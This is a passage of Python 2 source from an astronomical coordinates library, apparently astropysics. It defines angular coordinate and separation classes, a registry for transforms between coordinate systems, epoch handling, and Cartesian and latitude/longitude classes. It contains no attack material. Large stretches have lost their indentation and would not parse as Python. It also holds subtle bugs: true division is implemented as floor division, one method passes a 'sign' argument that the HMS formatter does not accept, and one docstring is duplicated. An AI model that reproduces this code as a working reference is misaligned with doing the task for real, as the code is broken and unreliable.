            from math import degrees
            if self._range[2] is None:
                return degrees(self._range[0]),degrees(self._range[1])
            else:
                return degrees(self._range[0]),degrees(self._range[1]),degrees(self._range[2])
    range = property(_getRange,_setRange,doc="""
    The acceptable range of angles for this :class:`AngularCoordinate`. This can
    be set as a 2-sequence (lower,upper), or as a 3-sequence (lower,upper,cycle),
    where cycle can be :
    * 0: Angle values are coerced to lie in the range (default for
      2-sequence if upper-lower is 360 degrees)
    * None: A :exc:`ValueError` will be raised if out-of-range (default for
      2-sequence otherwise)
    * A positive scalar: Values are coerced in a triangle wave scheme, with
      the scalar specifying the period. e.g. for the latitude, (-90,90,360)
      would give the correct behavior)
    """)
def __str__(self):
return self.getDmsStr(sep=('d',"'",'"'))
def __eq__(self,other):
if hasattr(other,'_decval'):
return self._decval==other._decval
else:
return self._decval==other
def __ne__(self,other):
return not self.__eq__(other)
def __add__(self,other):
if hasattr(other,'_decval'):
res = self.__class__()
res._decval = self._decval + other._decval
else:
res = self.__class__()
res._decval = self._decval + other
return res
def __sub__(self,other):
if isinstance(other,AngularCoordinate):
from math import degrees
res = AngularSeparation(degrees(other._decval),degrees(self._decval))
else:
res = AngularCoordinate()
res._decval = self._decval - other
return res
def __mul__(self,other):
res = self.__class__()
res._decval = self._decval*other
return res
def __div__(self,other):
res = self.__class__()
res._decval = self._decval/other
return res
def __truediv__(self,other):
res = self.__class__()
res._decval = self._decval//other
return res
def __pow__(self,other):
res = self.__class__()
res._decval = self._decval**other
return res
def __float__(self):
return self.degrees
def getDmsStr(self,secform='%05.2f',sep=(unichr(176),"'",'"'), sign=True,
canonical=False, inclzero=True):
"""
Generates the string representation of this AngularCoordinate as
degrees, arcminutes, and arcseconds.
:param secform: a formatter for the seconds
:type secform: string
:param sep:
The seperator between components - defaults to degree sign, ' and "
symbols.
:type sep: string or 3-tuple of strings
:param sign: Forces sign to be present before degree component.
:type sign: boolean
:param canonical: forces [+/-]dd:mm:ss.ss , overriding other arguments
:param inclzero:
If True, a "0" is included whenever even if the degrees or minutes
are 0. Otherise, the "0" and the corresponding separator are
omitted from the string.
:type inclzero: bool
:returns: String representation of this object.
"""
d,m,s = self.degminsec
if canonical:
secform = '%05.2f'
sep = (':',':','')
sign = True
s = secform%s
if int(float(s))>=60:
s = secform%0
m += 1
if m==60:
m = 0
d += 1
d,m=str(abs(d)),str(m)
if isinstance(sep,basestring):
if sep == 'dms':
sep = ('d','m','s')
sep = (sep,sep)
tojoin = []
if sign and self._decval >= 0:
tojoin.append('+')
if self._decval<0:
tojoin.append('-')
if inclzero or d is not '0':
tojoin.append(d)
tojoin.append(sep[0])
if inclzero or m is not '0':
tojoin.append(m)
tojoin.append(sep[1])
tojoin.append(s)
if len(sep)>2:
tojoin.append(sep[2])
return ''.join(tojoin)
def getHmsStr(self,secform = None,sep = ('h','m','s'), canonical = False,
inclzero=True):
"""
gets the string representation of this AngularCoordinate as hours,
minutes, and seconds
secform is the formatter for the seconds component
sep is the seperator between components - defaults to h, m, and s
canonical forces [+/-]dd:mm:ss.ss , overriding other arguments
Generates the string representation of this AngularCoordinate as hours,
minutes, and seconds.
:param secform: a formatter for the seconds component
:type secform: string
:param sep:
The seperator between components - defaults to 'h', 'm', and 's'.
:type sep: string or 3-tuple of strings
:param canonical: forces [+/-]dd:mm:ss.ss , overriding other arguments
:param inclzero:
If True, a "0" is included whenever even if the degrees or minutes
are 0. Otherise, the "0" and the corresponding separator are
omitted from the string.
:type inclzero: bool
:returns: String representation of this object.
"""
h,m,s = self.hrsminsec
if canonical:
secform = '%05.2f'
sep = (':',':','')
s = str(s) if secform is None else secform % s
#this is for the s=60 case
if int(float(s))>=60:
news = float(s) - 60
s = str(news) if secform is None else secform%news
m += 1
if m==60:
m = 0
h += 1
if h==24:
h = 0
h,m=str(h),str(m)
if isinstance(sep,basestring):
if sep == 'hms':
sep = ('h','m','s')
sep = (sep,sep)
tojoin = []
if inclzero or h is not '0':
tojoin.append(h)
tojoin.append(sep[0])
if inclzero or m is not '0':
tojoin.append(m)
tojoin.append(sep[1])
tojoin.append(s)
if len(sep)>2:
tojoin.append(sep[2])
return ''.join(tojoin)
class AngularSeparation(AngularCoordinate):
    """
    This class represents a separation between two angular coordinates on the
    unit sphere.
    A constructor is available, but the most natural way to generate this object
    is to use the subtraction (-) operator on two :class:`AngularCoordinate`
    objects or two :class:`LatLongCoordinates` objects.
    """
    def __init__(self,*args):
        """
        Input arguments can be either:
        * AngularSeparation(:class:`AngularSeparation` object)
            Generates a copy of the provided object.
        * AngularSeparation(sep)
            Generates a separation of the provided distance with no starting point.
        * AngularSeparation(start,end)
            Computes the separation from the start and end objects, which must
            be :class:`AngularCoordinate` objects.
        """
        if len(args) == 1:
            a = args[0]
            if a.__class__ == self.__class__:
                #copy constructor: duplicate the value and range directly
                self._decval = args[0]._decval
                self._range = args[0]._range
                return
            sep = a._decval if hasattr(a,'_decval') else a
        elif len(args) == 2:
            #separation is end minus start, in radians
            a0,a1 = args
            a0 = a0._decval if hasattr(a0,'_decval') else a0
            a1 = a1._decval if hasattr(a1,'_decval') else a1
            sep = a1 - a0
        else:
            raise ValueError('improper number of inputs to AngularSeparation')
        AngularCoordinate.__init__(self,sep)
    def __add__(self,other):
        #separation + coordinate gives a coordinate; separation + separation
        #falls through to the base class (giving a separation)
        if isinstance(other,AngularCoordinate) and not self.__class__ == other.__class__:
            res = AngularCoordinate()
            res._decval = self._decval+other._decval
            return res
        else:
            return AngularCoordinate.__add__(self,other)
    #comparisons - all operate on the underlying radian value
    def __lt__(self,other):
        return self._decval < other._decval
    def __le__(self,other):
        return self._decval <= other._decval
    def __gt__(self,other):
        return self._decval > other._decval
    def __ge__(self,other):
        return self._decval >= other._decval
    def __eq__(self,other):
        return self._decval == other._decval
    def __ne__(self,other):
        return self._decval != other._decval
    def _getArcsec(self):
        return self.degrees*3600
    def _setArcsec(self,val):
        self.degrees = val/3600
    arcsec = property(_getArcsec,_setArcsec,doc="""
    The separation in arcseconds.
    """)
    def _getArcmin(self):
        return self.degrees*60
    def _setArcmin(self,val):
        self.degrees = val/60
    arcmin = property(_getArcmin,_setArcmin,doc="""
    The separation in arcminutes.
    """)
    def projectedSeparation(self,zord,usez=False,**kwargs):
        """
        Computes the physical projected separation assuming a given distance.
        kwargs are passed into :func:`cosmo_z_to_dist` if `usez` is True.
        :param zord: Redshift or distance
        :type zord: scalar number
        :param usez:
            If True, the input will be interpreted as a redshift, and kwargs
            will be passed into the distance calculation. The result will be in
            pc. Otherwise, `zord` will be interpreted as a distance.
        :type usez: boolean
        :returns: a float value for the separation (in pc if redshift is used)
        """
        from .funcs import angular_to_physical_size
        return angular_to_physical_size(self.arcsec,zord,usez=usez,**kwargs)
    def separation3d(self,zord1,zord2,usez=False,**kwargs):
        """
        computes the 3d separation assuming the two points at the ends of this
        :class:`AngularSeparation` are at the distances `zord1` and `zord2`.
        :param zord1: Redshift or distance for start point
        :type zord1: scalar number
        :param zord2: Redshift or distance for end point
        :type zord2: scalar number
        :param usez:
            If True, the inputs will be interpreted as a redshift, and kwargs
            will be passed into the distance calculation. The result will be in
            pc. Otherwise, `zord` will be interpreted as a distance.
        :type usez: boolean
        :returns: a float value for the separation (in pc if redshift is used)
        """
        from math import sin,cos,sqrt
        if usez:
            d1 = cosmo_z_to_dist(zord1,disttype=2,**kwargs)*1e6 #pc
            #bugfix: was cosmo_z_to_dist(zord1,...), making d2 always equal d1
            d2 = cosmo_z_to_dist(zord2,disttype=2,**kwargs)*1e6 #pc
        else:
            if len(kwargs)>0:
                raise TypeError('if not using redshift, kwargs should not be provided')
            d1 = zord1
            d2 = zord2
        #law of cosines: c^2 = a^2 + b^2 - 2 a b cos(angle)
        costerm = 2*d1*d2*cos(self._decval)
        return sqrt(d1*d1+d2*d2-costerm)
#<-----------------------------Coordinate systems------------------------------>
class _CoosysMeta(ABCMeta):
    """
    Metaclass for CoordinateSystem class and subclasses - needed to support
    :class:`CoordinateSystem.registerTransform` decorator.
    """
    def __init__(cls,name,bases,dct):
        ABCMeta.__init__(cls,name,bases,dct)
        import inspect
        #find members that registerTransform left as _TransformerMethodDeco
        #markers and register each requested from/to pair, resolving the
        #special string 'self' to the class currently being created
        for k,v in inspect.getmembers(cls):
            if isinstance(v,_TransformerMethodDeco):
                for vfc,vtc in zip(v.fromclasses,v.toclasses):
                    fromclass = cls if vfc == 'self' else vfc
                    toclass = cls if vtc == 'self' else vtc
                    CoordinateSystem.registerTransform(fromclass,toclass,v.f,v.transtype)
                #replace the marker with the plain function as a staticmethod
                setattr(cls,k,staticmethod(v.f))
class _TransformerMethodDeco(object):
    """
    A marker object wrapping a method that was decorated with
    :meth:`CoordinateSystem.registerTransform`; the metaclass later turns it
    into real transform registrations.
    """
    def __init__(self,f,fromclass,toclass,transtype=None):
        #the wrapped transformation function
        self.f = f
        #transformation type name (or None for a plain transform)
        self.transtype = transtype
        #parallel lists of from/to classes registered for this function
        self.fromclasses = [fromclass]
        self.toclasses = [toclass]
#Default for optimizing convert functions - currently False because the
#optimizer is not yet smart enough to be trusted by default
_convertoptimizedefault = False
class CoordinateSystem(object):
"""
Base class of all coordinate systems. This class also holds the static
methods that manage conversion between coordinate systems.
*Subclassing*
* Subclasses of :class:`CoordinateSystem` must override :meth:`__init__` to
set initial values.
* :class:`CoordinateSystem` objects are intended to be quite small, so
unless there is a reason to do otherwise, subclasses should have a
:attr:`__slots__` class attribute (it should be a sequence of all the
valid attribute names for the object - see
http://docs.python.org/reference/datamodel.html for an explanation of the
`__slots__` mechanism).
* The :attr:`transweight` class variable can be set to determine the
weighting of this class when computing coordinate transformation pathways.
Note that *smaller* weights are preferred paths (e.g. a larger weight is
less likely to be visited). See
:meth:`CoordinateSystem.getTransformGraph` for more details.
"""
from collections import defaultdict as _defaultdict
__metaclass__ = _CoosysMeta
__slots__ = tuple()
    @abstractmethod
    def __init__(self):
        """Abstract - subclasses must override __init__ to set initial values."""
        raise NotImplementedError
_converters = _defaultdict(dict) #first index is from, second is to
_transtypes = dict()
@staticmethod
def registerTransform(fromclass,toclass,func=None,transtype=None,
overwrite=True):
"""
Register a function to transform coordinates from one system to another.
The transformation function is called is func(fromobject) and should
return a new object of type `toclass`. If called with no arguments,
the function should raise a :exc:`NotImplementedError` or behave in a
manner defined in subclasses (see e.g. :class:`LatLongCoordinates`).
If `transtype` is not None, the output of the transformation function is
filered through the function applied for that type using
:meth:`astropysics.CoordinateSystem.addTransType` .
If the transformation function `func` is None, the function is taken to
be a decorator, and if it is a method of a subclass of
:class:`CoordinateSystem`, `fromclass` or `toclass` may be the string
'self' . In this case, the function will use the class itself as the
from or to class. The function will then be treated as a static method
(e.g. it should not have `self` as the first argument).
:param fromclass: The class to transform from.
:type fromclass: subclass of :class:`CoordinateSystem` or 'self'
:param toclass: The class to transform to.
:type toclass: subclass of :class:`CoordinateSystem` or 'self'
:param func: the function to perform the transform or None if decorator.
:type func: a callable or None
:param transtype:
A transformation type that will be used to determine how the
transform is performed, or None for no transform type. (see
:meth:`astropysics.CoordinateSystem.addTransType` for details).
:type transtype: string or None
:param overwrite:
If True, any already existing function will be silently overriden.
Otherwise, a ValueError is raised.
:type overwrite: boolean
**Examples**::
class MyCoordinates(CoordinateSystem):
...
class YourCoordinates(CoordinateSystem):
...
def transformer(mycooobj):
...
return yourcoordobj
CoordinateSystem.registerTransform(MyCoordinates,YourCoordinates,transformer)
class TheirCoordinates(CoordinateSystem):
@CoordinateSystem.registerTransform(MyCoordinates,'self')
@classmethod
def fromMy(cls,mycoordinates):
...
return theircoordobj
"""
if func is None:
if fromclass != 'self':
if not issubclass(fromclass,CoordinateSystem):
raise TypeError('from class for registerTransform must be a CoordinateSystem')
if toclass != 'self':
if not issubclass(toclass,CoordinateSystem):
raise TypeError('to class for registerTransform must be a CoordinateSystem')
def make_or_extend_trans_meth_deco(f):
if isinstance(f,_TransformerMethodDeco):
f.fromclasses.append(fromclass)
f.toclasses.append(toclass)
elif callable(f):
return _TransformerMethodDeco(f,fromclass,toclass,transtype)
else:
raise TypeError('Tried to apply registerTransform to a non-callable')
return make_or_extend_trans_meth_deco
else:
if not issubclass(fromclass,CoordinateSystem) or not issubclass(toclass,CoordinateSystem):
raise TypeError('to/from classes for registerTransform must be CoordinateSystems')
if not overwrite and (toclass in CoordinateSystem._converters[fromclass]):
#format requires 2.6
#raise ValueError('function already exists to convert {0} to {1}'.format(fromclass,toclass))
raise ValueError('function already exists to convert %s to %s'%(fromclass,toclass))
if transtype is not None:
try:
ttf = CoordinateSystem._transtypes[transtype]
except KeyError:
raise KeyError('coordinate transformation type %s does not exist'%transtype)
lfunc = lambda cobj:ttf(func(cobj),cobj,toclass)
lfunc.basetrans = func
lfunc.transtype = transtype
CoordinateSystem._converters[fromclass][toclass] = lfunc
else:
func.transtype = None
CoordinateSystem._converters[fromclass][toclass] = func
CoordinateSystem._invalidateTransformCache()
@staticmethod
def getTransform(fromclass,toclass):
"""
Returns the transformation function to go from `fromclass` to `toclass`.
"""
return CoordinateSystem._converters[fromclass][toclass]
@staticmethod
def listAllTransforms():
"""
Returns a list of 2-tuples (fromclass,toclass) of all the coordinate
system combinations that have registered transformation functions.
"""
trlist = []
for fr,l in CoordinateSystem._converters.iteritems():
for li in l:
trlist.append((fr,li))
return trlist
@staticmethod
def listTransformsTo(toclass):
"""
Returns a list of classes that can be transformed to the supplied class.
"""
flist = []
for fr,l in CoordinateSystem._converters.iteritems():
for li in l:
if li is toclass:
flist.append(fr)
return flist
@staticmethod
def listTransformsFrom(fromclass):
"""
Returns a list of classes that can be transformed from the supplied
class.
"""
if fromclass in CoordinateSystem._converters:
return list(CoordinateSystem._converters[fromclass])
else:
return []
@staticmethod
def delTransform(fromclass,toclass):
"""
Deletes the transformation function to go from `fromclass` to `toclass`.
"""
del CoordinateSystem._converters[fromclass][toclass]
CoordinateSystem._invalidateTransformCache()
@staticmethod
def addTransType(funcorname):
"""
Registers a new transformation type. Transformation types are used to
implement particular types of transformations without repeating similar
code in each of the actual transformation functions.
The transformation type function (`funcorname`) will be called as
transfunc(trans,coords,toclass), where trans is the output of the actual
registered transformation function, coords is the coordinate object that
is being converted, and toclass is the target class.
:param funcorname:
The function to register as the transfromation type function. If a
string, the string is taken to be the name to use for the
transformation (intended for use as a function decorator).
Otherwise, the transformation type name is taken from the name of
the function with any intial _ removed.
:type funcorname: callable or string
:returns:
The function itself, to allow for use as a decorator. Note that this
means that if used as a decorator inside a class, the function will
be assigned as an *instance* method. Alternative, if `funcorname`
is a string, a function to be called on the transformation function
will be returned (see second example).
**Examples**::
@addTransType
def trans1(trans,coord,tocls):
return tocls(trans*coord.val)
@addTransType('trans1')
def _transfunc(trans,coord,tocls):
return tocls(trans*coord.val)
"""
def regtrans(func,typename):
if typename in CoordinateSystem._transtypes:
#go through and re-assign all existing transes to use the new one
for k,v in CoordinateSystem._converters.iteritems():
for k2,v2 in v.items():
if v2.transtype == typename:
btfunc = v2.basetrans
coof = lambda cobj:func(btfunc(cobj),cobj,k2)
coof.transtype = typename
coof.basetrans = btfunc
CoordinateSystem._converters[k][k2] = coof
CoordinateSystem._transtypes[typename] = func
return func
if isinstance(funcorname,basestring):
typename = funcorname
return lambda f:regtrans(f,typename)
elif callable(funcorname):
typename = funcorname.func_name
if typename.startswith('_'):
typename = typename[1:]
return regtrans(funcorname,typename)
else:
raise TypeError('funcorname is neither a callable nor a string')
    @staticmethod
    def getTransformPath(fromsys,tosys):
        """
        Determines the transformation path from one coordinate system to another
        for use with :meth:`convert`.
        :param fromsys: The starting coordinate system class
        :param tosys: The target coordinate system class
        :returns:
            A list of coordinate classes with the shortest path from `fromsys`
            to `tosys` (*including* `fromsys` and `tosys`) or a callable with
            the transformation if a single-step direct transformation is
            available
        :except NotImplementedError: If no path can be found.
        """
        if tosys in CoordinateSystem._converters[fromsys]:
            #a direct transform is registered - return the function itself
            return CoordinateSystem._converters[fromsys][tosys]
        else:
            failstr = 'cannot convert coordinate system %s to %s'%(fromsys.__name__,tosys.__name__)
            try:
                import networkx as nx
                g = CoordinateSystem.getTransformGraph()
                #the weight/weighted keyword changed after networkx 1.4
                #NOTE(review): lexicographic version-string comparison - would
                #misclassify versions like '1.10'; confirm acceptable
                if nx.__version__>'1.4':
                    path = nx.shortest_path(g,fromsys,tosys,weight=True)
                else:
                    path = nx.shortest_path(g,fromsys,tosys,weighted=True)
                if not path:
                    raise NotImplementedError(failstr+'; no transform path could be found')
                return path
            except ImportError,e:
                #only swallow the ImportError for networkx itself
                if e.args[0] == 'No module named networkx':
                    raise NotImplementedError(failstr+'; networkx not installed')
                else:
                    raise
    #cached networkx DiGraph of registered transforms (built lazily below)
    _transgraph = None
    @staticmethod
    def getTransformGraph():
        """
        Returns a `networkx <http://networkx.lanl.gov/>` :class:`DiGraph` object
        representing a graph of the registered coordinate systems and the
        transformations between them.
        :except ImportError: If networkx is not installed.
        """
        import networkx as nx
        if CoordinateSystem._transgraph is None:
            CoordinateSystem._transgraph = g = nx.DiGraph()
            transes = []
            for a,b in CoordinateSystem.listAllTransforms():
                #edge weight is the mean of the two systems' transweight
                #attributes (default 1)
                #NOTE(review): integer division when both weights are ints
                #under Python 2 - confirm this rounding is intended
                avgweight = (getattr(a,'transweight',1) +
                             getattr(b,'transweight',1))/2
                transes.append((a,b,dict(weight=avgweight)))
            g.add_edges_from(transes)
        #return a copy so callers cannot mutate the cached graph
        return CoordinateSystem._transgraph.copy()
    #cache of transform results; reset whenever registrations change
    _transformcache = _defaultdict(dict)
    @staticmethod
    def _invalidateTransformCache():
        """
        Called when transforms are changed to invalidate the caches
        """
        from collections import defaultdict
        CoordinateSystem._transformcache = defaultdict(dict)
        CoordinateSystem._transgraph = None
def convert(self,tosys):
"""
converts the coordinate system from it's current system to a new
:class:`CoordinateSystem` object.
:param tosys:
The new coordinate system class. Should be a subclass of
:class:`CoordinateSystem` .
:returns: A new object of a class determined by `tosys`
:except: raises :exc:`NotImplementedError` if conversion is not present
"""
convpath = CoordinateSystem.getTransformPath(self.__class__,tosys)
if callable(convpath):
return convpath(self)
else:
currobj = self
currsys = self.__class__
for intersys in convpath[1:-1]:
currobj = CoordinateSystem._converters[currsys][intersys](currobj)
currsys = intersys
return CoordinateSystem._converters[currsys][tosys](currobj)
class EpochalCoordinates(CoordinateSystem):
"""
A base class for :class:`CoordinateSystem` classes that have *changeable*
epochs associated with them.
*Subclassing*
Subclasses must implement these methods:
* :meth:`__init__` from :class:`CoordinateSystem`
* :meth:`transformToEpoch` -- see the method's entry for details.
Furthermore, subclasses should set :attr:`julianepoch` to determine if they
are Julian or Besselian.
"""
#TODO:figure out if there's a way to put this back in to save space - right
#now if two __slots__ classes are mixed together, this is thrown:
#TypeError: Error when calling the metaclass bases multiple bases have instance lay-out conflict
#__slots__ = ('_epoch',)
julianepoch = True
"""
If True, the epoch is Julian, otherwise, Besselian
"""
def __getstate__(self):
return {'_epoch':self._epoch}
def __setstate__(self,d):
self._epoch = d['_epoch']
    def _getEpoch(self):
        return self._epoch
    def _setEpoch(self,val):
        if val is None:
            self._epoch = None
        else:
            if val == 'now':
                #resolve 'now' to the current epoch value
                from ..obstools import jd_to_epoch
                val = jd_to_epoch(None,self.julianepoch)
            if not hasattr(self,'_epoch') or self._epoch is None:
                #no current epoch - store directly, no transformation possible
                self._epoch = float(val)
            else:
                #transform the coordinate to the new epoch (which also updates
                #self._epoch via EpochalCoordinates.transformToEpoch)
                self.transformToEpoch(float(val))
    epoch = property(_getEpoch,_setEpoch,doc="""
    Epoch for this coordinate as a float.
    Setting with the string 'now' will set the epoch to the time at the moment
    the command is executed.
    If set, this coordinate will be transformed to the new epoch, unless the
    current Epoch is None, in which case the epoch will be set with no
    transformation. If transformation is *not* desired, first set the epoch to
    None, and then set to the new epoch.
    Julian vs. Besselian is determined by the :attr:`julianepoch` attribute.
    """)
def _getEpochstr(self):
#format requires 2.6
#return '{0}{1}'.format('J' if self.julianepoch else 'B',self._epoch)
if self._epoch is None:
return ''
else:
return '%s%s'%('J' if self.julianepoch else 'B',self._epoch)
def _setEpochstr(self,val):
self.epoch = val
epochstr = property(_getEpochstr,_setEpochstr,doc="""
A string representation of the epoch of this object with a J or B prefixed
for julian or besselian epochs.
""")
    def _getJdepoch(self):
        from ..obstools import epoch_to_jd
        return epoch_to_jd(self._epoch,self.julianepoch)
    def _setJdepoch(self,val):
        from ..obstools import jd_to_epoch
        #note: assigns _epoch directly, so no epoch transformation is triggered
        self._epoch = jd_to_epoch(val,self.julianepoch)
    jdepoch = property(_getJdepoch,_setJdepoch,doc="""
    Julian Date of the epoch for this object.
    """)
    def _getMjdepoch(self):
        from ..obstools import epoch_to_jd
        return epoch_to_jd(self._epoch,self.julianepoch,mjd=True)
    def _setMjdepoch(self,val):
        from ..obstools import jd_to_epoch
        #note: assigns _epoch directly, so no epoch transformation is triggered
        self._epoch = jd_to_epoch(val,self.julianepoch,mjd=True)
    mjdepoch = property(_getMjdepoch,_setMjdepoch,doc="""
    Modified Julian Date of the epoch for this object.
    """)
    @abstractmethod
    def transformToEpoch(self,newepoch):
        """
        Subclasses should implement this method to transform their coordinates
        to a new epoch. At the end of this method after the necessary data
        transformations are performed, subclasses should call
        ``EpochalCoordinates.transformToEpoch(newepoch)``.
        """
        #base implementation only records the new epoch value
        self._epoch = newepoch
class RectangularCoordinates(CoordinateSystem):
    """
    Rectangular/Cartesian Coordinates in three dimensions. Coordinates are
    accessed via the attributes :attr:`x`, :attr:`y`, and :attr:`z`.
    """
    __slots__ = ('x','y','z')
    def __init__(self,x,y,z):
        #: x cartesian coordinate value
        self.x = x
        #: y cartesian coordinate value
        self.y = y
        #: z cartesian coordinate value
        self.z = z
    def __getstate__(self):
        #TODO: watch if this creates probelms by not being a dict
        return {'x':self.x,'y':self.y,'z':self.z}
    def __setstate__(self,d):
        for attrname in ('x','y','z'):
            setattr(self,attrname,d[attrname])
    def __str__(self):
        return '%s: x=%f,y=%f,z=%f'%(self.__class__.__name__,self.x,self.y,self.z)
    def __add__(self,other):
        """Componentwise vector addition; preserves the subclass via deepcopy."""
        from copy import deepcopy
        if hasattr(other,'x') and hasattr(other,'y') and hasattr(other,'z'):
            summed = deepcopy(self)
            summed.x = self.x+other.x
            summed.y = self.y+other.y
            summed.z = self.z+other.z
            return summed
        raise TypeError('Object of type %s does not have x,y, and z for operand +'%other.__class__)
    def __sub__(self,other):
        """Componentwise vector subtraction; preserves the subclass via deepcopy."""
        from copy import deepcopy
        if hasattr(other,'x') and hasattr(other,'y') and hasattr(other,'z'):
            diff = deepcopy(self)
            diff.x = self.x-other.x
            diff.y = self.y-other.y
            diff.z = self.z-other.z
            return diff
        raise TypeError('Object of type %s does not have x,y, and z for operand -'%other.__class__)
    def _getLength(self):
        from math import sqrt
        return sqrt(self.x**2+self.y**2+self.z**2)
    def _setLength(self,val):
        #rescale all three components so the norm becomes val
        scaling = val/self._getLength()
        self.x *= scaling
        self.y *= scaling
        self.z *= scaling
    length = property(_getLength,_setLength,doc="""
    The Length of this coordinate's vector e.g. distance from the origin. If
    set, the direction will be preserved but the vector will be scaled to the
    provided value.""")
CartesianCoordinates = RectangularCoordinates
class _LatLongMeta(_CoosysMeta):
    """
    Metaclass that aliases the generic `long`/`lat` properties (and their
    error counterparts) under the subclass-specific names given in
    :attr:`_longlatnames_` (e.g. 'ra'/'dec').
    """
    def __init__(cls,name,bases,dct):
        _CoosysMeta.__init__(cls,name,bases,dct)
        #a None entry in _longlatnames_ means no alias for that coordinate
        if cls._longlatnames_[0] is not None:
            setattr(cls,cls._longlatnames_[0],cls.long)
            setattr(cls,cls._longlatnames_[0]+'err',cls.longerr)
        if cls._longlatnames_[1] is not None:
            setattr(cls,cls._longlatnames_[1],cls.lat)
            setattr(cls,cls._longlatnames_[1]+'err',cls.laterr)
class LatLongCoordinates(CoordinateSystem):
"""
This object represents an angular location on a sphere as represented in
spherical coordinates with a latitude and longitude, and optionally a
distance. Subclasses specify details such as transformations or epochs.
A :class:`LatLongCoordinate` system is designed to use the transformation
type (see :meth:`CoordinateSystem.addTransType`) 'smatrix'. Thus, if the
transformation between two :class:`LatLongCoordinate` subclasses can be
represented as a unitary matrix operating on position vectors on the unit
sphere, the transformation function can be written as::
@CoordinateSystem.registerTransform(InLLCoords,OutLLCoords,transtype='smatrix')
def transform(incoord):
... compute the elements of a 3x3 transformation matrix...
return np.mat([[a,b,c],[d,e,f],[g,h,i]])
*Subclassing*
Subclasses of :class:`LatLongCoordinates` can have the class attribute
:attr:`_longlatnames_` as a 2-tuple of strings (longname,latname), with
names for the two coordinates, e.g. ('ra','dec'). They can also include the
:attr:`_longrange_` attribute, which specifies the range of valid values for
the longitude (latitude is always -90 to 90 degrees), or None to place no
restriction. See :class:`CoordinateSystem` for additional subclassing
information.
"""
__slots__ = ('_lat','_long','_laterr','_longerr','_dpc')
__metaclass__ = _LatLongMeta
_longlatnames_ = ('longitude','latitude')
_longrange_ = None
def __init__(self,long=0,lat=0,longerr=None,laterr=None,distancepc=None):
"""
See the associated attribute docstrings for the meaning of the inputs.
"""
self._lat = AngularCoordinate(range=(-90,90,360))
self._long = AngularCoordinate(range=self._longrange_)
self.distancepc = distancepc
if hasattr(lat,'lat') and hasattr(lat,'long'):
if long is 0 and laterr is None and longerr is None:
self.lat = lat.lat
self.long = lat.long
self.laterr = lat.laterr
self.longerr = lat.longerr
else:
raise ValueError("can't provide a LatLongCoordinates as a constructor and set other values simultaneously")
else:
self.lat = lat
self.long = long
self.laterr = laterr
self.longerr = longerr
def __getstate__(self):
return dict([(k,getattr(self,k)) for k in LatLongCoordinates.__slots__])
def __setstate__(self,d):
for k in LatLongCoordinates.__slots__:
setattr(self,k,d[k])
def _getDistancepc(self):
if callable(self._dpc):
return self._dpc()
else:
return self._dpc
def _setDistancepc(self,val):
if val is None:
self._dpc = None
elif callable(val):
self._dpc = val
else:
try:
self._dpc = (float(val[0]),float(val[1]))
except (TypeError,IndexError):
self._dpc = (float(val),0)
distancepc = property(_getDistancepc,_setDistancepc,doc="""
Parallax distance to object in parsecs, or None to assume infinity. Set as
either a float, a 2-tuple (distance,distance_error), or a no-argument
callable that returns such a tuple. Getter always returns 2-tuple or None.
""")
    def _getDistanceau(self):
        from ..constants import aupercm,cmperpc
        #AU-per-parsec conversion factor
        auperpc = cmperpc * aupercm
        if self._dpc is None:
            return None
        elif callable(self._dpc):
            #deferred (distance,error) computation - evaluate now
            res = self._dpc()
        else:
            res = self._dpc
        return (res[0]*auperpc,res[1]*auperpc)
    def _setDistanceau(self,val):
        from ..constants import cmperau,pcpercm
        #parsec-per-AU conversion factor
        pcperau = cmperau * pcpercm
        if val is None:
            self._dpc = None
        elif callable(val):
            #wrap the callable so it yields parsecs when later invoked
            self._dpc = lambda: tuple((v*pcperau for v in val()))
        else:
            try:
                self._dpc = (float(val[0])*pcperau,float(val[1])*pcperau)
            except (TypeError,IndexError):
                #scalar input - assume zero error
                self._dpc = (float(val)*pcperau,0)
    distanceau = property(_getDistanceau,_setDistanceau,doc="""
    Parallax distance to object in AU, or None to assume infinity. Set as either
    a float, a 2-tuple (distance,distance_error), or a no-argument callable that
    returns such a tuple. Getter always returns 2-tuple or None.
    """)
    def _getLat(self):
        return self._lat
    def _setLat(self,val):
        if isinstance(val,AngularCoordinate):
            rads = val.radians%_twopi
        else:
            rads = AngularCoordinate(val).radians%_twopi
        #fix for radian range: fold the [0,2pi) value onto [-pi/2,pi/2]
        if rads > 3*pi/2:
            #(3pi/2,2pi) maps to (-pi/2,0)
            rads -= _twopi
        elif rads > pi/2:
            #(pi/2,3pi/2] is reflected about pi/2 (e.g. 100deg -> 80deg)
            rads = pi - rads
        self._lat.radians = rads
    lat = property(_getLat,_setLat,doc="""
    Latitude of this object as a :class:`AngularCoordinate` object. May be set
    using any valid input form for :class:`AngularCoordinate`.
    """)
def _getLong(self):
    return self._long
def _setLong(self,val):
    """Normalize input to an :class:`AngularCoordinate` and wrap to [0,2pi)."""
    if not isinstance(val,AngularCoordinate):
        val = AngularCoordinate(val)
    self._long.radians = val.radians%_twopi
long = property(_getLong,_setLong,doc="""
Longitude of this object as a :class:`AngularCoordinate` object. May be set
using any valid input form for :class:`AngularCoordinate`.
""")
def _getLaterr(self):
    return self._laterr
def _setLaterr(self,val):
    """Store None, or coerce the input to an :class:`AngularSeparation`."""
    if val is None:
        self._laterr = None
    else:
        self._laterr = val if isinstance(val,AngularSeparation) else AngularSeparation(val)
laterr = property(_getLaterr,_setLaterr,doc="""
Latitude error for this object as a :class:`AngularSeparation` object. May
be set using any valid input form for :class:`AngularSeparation`.
""")
def _getLongerr(self):
    return self._longerr
def _setLongerr(self,val):
    """Store None, or coerce the input to an :class:`AngularSeparation`."""
    if val is None:
        self._longerr = None
    else:
        self._longerr = val if isinstance(val,AngularSeparation) else AngularSeparation(val)
longerr = property(_getLongerr,_setLongerr,doc="""
Longitude error for this object as a :class:`AngularSeparation` object. May
be set using any valid input form for :class:`AngularSeparation`.
""")
def __str__(self):
    """Readable summary in the form ``ClassName: long=...,lat=...``."""
    longname,latname = self._longlatnames_
    return '%s: %s=%f,%s=%f'%(self.__class__.__name__,longname,self._long.d,latname,self._lat.d)
def getCoordinateString(self,sep=' ',labels=False,canonical=False,hmslong=False):
    """
    Build a string of the form ``<longname>=<longstr><sep><latname>=<latstr>``.
    Longitude is rendered as HMS if `hmslong` is True, otherwise DMS;
    latitude is always DMS.
    """
    # NOTE(review): the `labels` parameter is currently ignored -- the
    # long/lat names are always prepended regardless of its value.
    if hmslong:
        longstr = self._long.getHmsStr(canonical=canonical,sign=False)
    else:
        longstr = self._long.getDmsStr(canonical=canonical,sign=False)
